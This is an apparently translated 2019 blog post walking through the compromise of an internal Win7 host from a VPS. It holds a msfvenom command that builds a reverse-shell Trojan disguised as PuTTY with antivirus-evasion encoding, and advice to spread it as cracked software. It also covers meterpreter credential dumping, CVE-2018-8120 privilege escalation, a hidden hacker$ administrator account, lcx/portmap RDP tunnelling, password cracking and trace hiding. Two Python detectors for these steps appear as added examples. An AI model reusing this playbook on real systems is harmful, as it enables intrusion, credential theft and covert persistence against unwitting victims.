VPS penetration of an intranet Win7 host

Preparation

Environment:

centos7 (a public-network IP applied for temporarily, purely for this experiment)
Metasploit penetration framework
CVE-2018-8120 local privilege escalation executable
Windows Exploit Suggester
PuTTY executable
lcx (port forwarding tool for Windows)
portmap (port forwarding tool for Linux)
SAMInside (cracks system user passwords)

Attack Topology

VPS: configuring the attack environment:

Installing Metasploit on centos7

yum install -y curl wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall      //Grant execute permission to msfinstall
./msfinstall              //Run the installer; after it succeeds, the following steps connect the freshly downloaded msf to its database
adduser msf               //Add an msf user; you will be prompted for the new account's password
su msf                    //Switch to the msf user

Generate the Trojan and bind it to a program (you can also use shellter to bind the Trojan to the program; this is personal preference):

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8001 -e x86/shikata_ga_nai -x putty.exe  -k -i 5 -f exe -o backdoor.exe
msfvenom -p windows/shell_reverse_tcp   use the shell_reverse_tcp payload
LHOST=                                  set the attacker's IP address
LPORT=8001                              set the port the Trojan will actively connect back to; the attacker listens on this port
-e x86/shikata_ga_nai                   re-encode the payload with the shikata_ga_nai encoder so that the re-encoded payload evades antivirus
-x putty.exe                            bundle the Trojan into the specified executable template, here putty.exe
-i 5                                    run the chosen encoder five times over the payload. (In theory, multiple encoding rounds help evade detection, but not necessarily, since evasion is never free: as evasion techniques develop rapidly, every new one is targeted by the major security vendors as soon as it appears.)
-f exe                                  specify exe as the MSF encoder's output format
-o backdoor.exe                         specify the output path for the finished file

Use upx on Kali to pack the Trojan and try to evade antivirus

upx -5 backdoor.exe

Packed successfully; scan it.

Interrupted here; nothing got through, so the antivirus evasion work is left for later study.
Another approach is to bind the Trojan to cracked software, since cracked software downloaded from the Internet usually tells users to turn off their firewall; this social engineering angle gets the Trojan downloaded and executed. (The Trojan needs to be renamed to an innocuous name, e.g. putty portable edition.exe; names like backdoor or shell are far too obvious, and anyone can see at a glance that there is a problem with such an executable.)

Get the meterpreter shell and view system information

[root@vultr ~]# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 
msf5 exploit(multi/handler) > set LPORT 8001
LPORT => 8001
msf5 exploit(multi/handler) > run

The target machine runs the Trojan file and the VPS gets a meterpreter shell

meterpreter > getuid         //View current user
meterpreter > sysinfo        //View system information
meterpreter > ps             //View system processes
meterpreter > netstat -ano   //View open ports
meterpreter > shell          //Get an interactive shell
meterpreter > run hashdump   //Dump user password hashes
meterpreter > load mimikatz  //Load mimikatz
meterpreter > kerberos       //Get user plaintext passwords

Insufficient permissions: the user passwords and hashes cannot be obtained.

Generate the system information file systeminfo.txt

meterpreter > shell             //Get an interactive shell
C:\Users\wwb\Desktop>systeminfo >systeminfo.txt //Write the system configuration to systeminfo.txt in the current directory

Using Windows-Exploit-Suggester

meterpreter > download c:\\Users\\wwb\\Desktop\\systeminfo.txt //Download systeminfo.txt to the local machine

python wes.py --update        //Download the vulnerability database from Microsoft
python wes.py -e systeminfo.txt >result.txt  //Compare installed patches, collect the exploitable vulnerabilities and store them in result.txt in the current directory

Check result.txt and pick a vulnerability to exploit.

CVE-2018-8120 privilege escalation

Searching the exploit collection turns up a local privilege escalation program for CVE-2018-8120.
meterpreter > upload /root/CVE-2018-8120.exe c:\\Users\\wwb\\Desktop //Upload to the target host's desktop directory
meterpreter > shell
C:\Users\wwb\Desktop>cve-2018-8120.exe "whoami" //Escalate privileges and run whoami

C:\Users\wwb\Desktop>cve-2018-8120.exe "net user hacker$ hacker /add" //Add the hidden user hacker$ with password hacker
C:\Users\wwb\Desktop>cve-2018-8120.exe "net localgroup administrators hacker$ /add" //Add hacker$ to the Administrators group
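From the defender's side, the two commands above leave a distinctive trail in the Windows Security log. The following detector is an added example, not code from the original post: it flags a `$`-suffixed (hidden) local account being created and added to Administrators, and a `net user ... /add` appearing in a process command line. The event records are constructed samples; their field names are assumptions modelled on events 4688, 4720 and 4732, not a real log export.

```python
import re

# Constructed sample records standing in for parsed Windows Security events:
# 4688 (process creation with command line), 4720 (user account created),
# 4732 (member added to a security-enabled local group). Field names are
# assumptions modelled on the event schema, not a real log export.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Users\wwb\Desktop\cve-2018-8120.exe",
     "CommandLine": 'cve-2018-8120.exe "net user hacker$ hacker /add"'},
    {"EventID": 4720, "TargetUserName": "hacker$", "SubjectUserName": "wwb"},
    {"EventID": 4732, "TargetUserName": "Administrators", "MemberName": r"WIN7-PC\hacker$"},
    {"EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "Administrator"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe systeminfo.txt"},
]

# Matches `net user <name> <password> /add` (also the net1 / net.exe spellings).
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)

def looks_hidden(name):
    """A local account whose name ends in '$' is not listed by `net user`
    (the trick used above); legitimate '$' accounts are machine accounts,
    which are not created interactively on a workstation."""
    return name.endswith("$")

def detect(events):
    """Return (rule, account) findings in event order; [] means clean."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4688:
            m = NET_USER_ADD.search(ev.get("CommandLine", ""))
            if m:
                # Account creation from a command line is rare for normal users,
                # and here the launcher is another binary rather than net.exe.
                findings.append(("net_user_add_in_cmdline", m.group(1)))
        elif eid == 4720 and looks_hidden(ev.get("TargetUserName", "")):
            findings.append(("hidden_user_created", ev["TargetUserName"]))
        elif eid == 4732 and ev.get("TargetUserName", "").lower() == "administrators":
            member = ev.get("MemberName", "").split("\\")[-1]  # strip the HOST\ prefix
            if looks_hidden(member):
                findings.append(("hidden_user_made_admin", member))
    return findings

if __name__ == "__main__":
    for rule, account in detect(SAMPLE_EVENTS):
        print(f"{rule}: {account}")
```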

Get the original administrator password

Port Mapping

Upload lcx.exe to the target:
meterpreter > upload /root/lcx.exe c:\\Users\\wwb\\Desktop //Upload to the target host's desktop directory
meterpreter > shell
C:\Users\wwb\Desktop>netstat -ano              //View open ports
C:\Users\wwb\Desktop>lcx -slave 55 3389 //Forward local port 3389 to port 55 on the public VPS
[root@vultr ~]# ./portmap -m 2 -p1 55 -p2 56 //Listen on port 55 and forward to port 56
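The relay set up above has a recognisable footprint in `netstat -ano` on the victim: one process holding an established connection to the local RDP port and, at the same time, an established connection to an outside address. This detector is an added example, not code from the original post; the netstat text is a constructed sample, and "internal" is defined as loopback plus the RFC 1918 ranges (an assumption; widen it for your own network).

```python
import ipaddress

# Constructed `netstat -ano` sample: PID 2840 bridges 127.0.0.1:3389 to an
# outside host on port 55, the shape left by `lcx -slave`. PID 1234 is the
# RDP service itself and PID 4 is ordinary SMB traffic to another LAN host.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1234
  TCP    192.168.1.10:49711     198.51.100.7:55        ESTABLISHED     2840
  TCP    127.0.0.1:49712        127.0.0.1:3389         ESTABLISHED     2840
  TCP    127.0.0.1:3389         127.0.0.1:49712        ESTABLISHED     1234
  TCP    192.168.1.10:49800     192.168.1.20:445       ESTABLISHED     4
  UDP    0.0.0.0:5355           *:*                                    1080
"""

# Assumption: anything outside these ranges counts as an external address.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
RDP_PORT = 3389

def parse_netstat(text):
    """Return (proto, local_ip, local_port, remote_ip, remote_port, state, pid)
    for every TCP row; header, blank and UDP rows (no State column) are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0].upper() != "TCP":
            continue
        proto, local, remote, state, pid = parts
        lip, lport = local.rsplit(":", 1)
        rip, rport = remote.rsplit(":", 1)
        # IPv6 rows look like [::1]:3389; strip the brackets for ipaddress.
        rows.append((proto, lip.strip("[]"), int(lport), rip.strip("[]"),
                     int(rport), state, int(pid)))
    return rows

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)

def find_rdp_relays(text):
    """PIDs with both an established connection to RDP on an internal address
    and an established connection to an external address; returns sorted
    (pid, "external_ip:port") pairs."""
    by_pid = {}
    for _, _lip, _lport, rip, rport, state, pid in parse_netstat(text):
        if state != "ESTABLISHED":
            continue
        entry = by_pid.setdefault(pid, {"rdp": False, "ext": []})
        if rport == RDP_PORT and not is_external(rip):
            entry["rdp"] = True
        elif is_external(rip):
            entry["ext"].append(f"{rip}:{rport}")
    return sorted((pid, ext) for pid, e in by_pid.items() if e["rdp"] for ext in e["ext"])
```

Run against real output, the returned PID can be matched to its image path with `tasklist /fi "PID eq <pid>"`, which is how a renamed lcx binary hidden in some folder is located.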

The Remote Desktop service is enabled:


On the VPS, open a new terminal and run portmap to listen and forward:

SAMInside tool

Because the VPS does not have desktop services installed, another Win10 host is used to connect to the target host remotely.
Open Remote Desktop Connection, share a local drive (Remote Desktop Connection - Local Resources - More), log in remotely as the hacker$ account and copy SAMInside over (instead of using meterpreter's upload). (In a real environment, however, never let your real host exchange traffic with the target host; many VPS hops are used in between to hide yourself.)

Run SAMInside as administrator

The password is too complex to crack locally and needs outside help.
Crack the system password hash online

Got the administrator account password: wwb/asd123

Clear Traces

Log in remotely with the original administrator account.

Delete the added hacker$ account

Delete the uploaded tool files

When deleting lcx, it turned out that it cannot be removed, because we still need this executable to map the target's port 3389 to the VPS. For an executable that stays in use like this, find a folder to hide it in.

Clear logs

To be continued; updates and improvements to follow.

Tags: shell Windows encoding network

Posted on Tue, 03 Sep 2019 18:22:27 -0700 by samsunnyuk